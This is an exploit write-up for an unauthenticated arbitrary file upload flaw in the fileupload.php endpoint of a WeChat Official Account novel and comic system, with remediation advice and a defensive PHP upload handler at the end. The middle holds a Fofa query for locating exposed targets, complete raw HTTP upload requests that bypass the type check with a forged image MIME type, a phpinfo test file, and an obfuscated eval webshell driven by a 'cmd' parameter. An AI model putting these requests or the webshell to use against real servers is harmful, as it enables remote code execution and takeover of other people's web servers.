0x01 Vulnerability description:
The fileupload.php endpoint of the WeChat Official Account novel and comic system (微信公众号小说漫画系统) has an arbitrary file upload vulnerability that allows an unauthenticated attacker to upload malicious files and achieve code execution. This weakness lets an attacker write a backdoor onto the server, obtain server privileges, and ultimately take control of the entire web server. An attacker may bypass file-type restrictions by renaming files, forging the MIME type, and similar means, then upload a file containing malicious code. Once the upload succeeds, the attacker can execute that code by requesting the file's URL, which poses a serious security threat.
0x02 Search query:
Fofa:"/Public/home/mhjs/jquery.js"
0x03 Vulnerability reproduction:
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW
Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639
Host: your-ip
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
After the upload succeeds, request the uploaded file at its path:
https://your-ip/Public/webuploader/0.1.5/server/upload/1.php
Webshell upload
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW
Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639
Host: your-ip
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: image/jpeg
<?php class G643t6Jo { public function __construct($HPyRR){ @eval("/*Z20S9180P1*/".$HPyRR."/*Z20S9180P1*/"); }}new G643t6Jo($_REQUEST['cmd']);?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
Establish the connection.
0x04 Remediation recommendations:
Restrict the file extensions that may be uploaded.
Remove the endpoint from the internet-exposed surface, or enforce access permissions on it.
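The two recommendations above, as an added PHP example (not the project's own fileupload.php): a replacement upload handler that applies a server-side extension allowlist, sniffs the real content type instead of trusting the client's Content-Type, stores the file under a server-chosen random name, and rejects unauthenticated requests. The storage directory and the session key `user_id` are assumptions.

```php
<?php
declare(strict_types=1);

// Allowlist: extension => MIME type the file's own bytes must sniff as.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];
const MAX_BYTES = 5 * 1024 * 1024;
const UPLOAD_DIR = '/var/app/uploads'; // assumption: outside the web root, never executed

function validate_upload(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload error'];
    }
    if ($file['size'] > MAX_BYTES) {
        return [false, 'file too large'];
    }
    // Only the final, lower-cased extension is consulted, so "1.PHP" or a
    // double extension cannot slip past the allowlist; the client name is otherwise ignored.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return [false, 'extension not allowed'];
    }
    // Sniff the actual content; a PHP script sent with Content-Type: image/jpeg fails here.
    $real = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($real !== ALLOWED[$ext]) {
        return [false, 'content does not match extension'];
    }
    // Server-chosen random name: the uploader never controls the stored path.
    return [true, bin2hex(random_bytes(16)) . '.' . $ext];
}

// Require an authenticated session (assumed to be set by the application's login)
// before touching the upload at all, closing the unauthenticated access described above.
session_start();
if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    exit;
}
[$ok, $result] = validate_upload($_FILES['file'] ?? []);
if (!$ok) {
    http_response_code(400);
    exit($result);
}
if (!move_uploaded_file($_FILES['file']['tmp_name'], UPLOAD_DIR . '/' . $result)) {
    http_response_code(500);
    exit;
}
echo json_encode(['stored' => $result]);
```

Serving the stored files through a download script (or a directory with PHP execution disabled) rather than directly from a web-served path is what makes the random name and non-executable location effective.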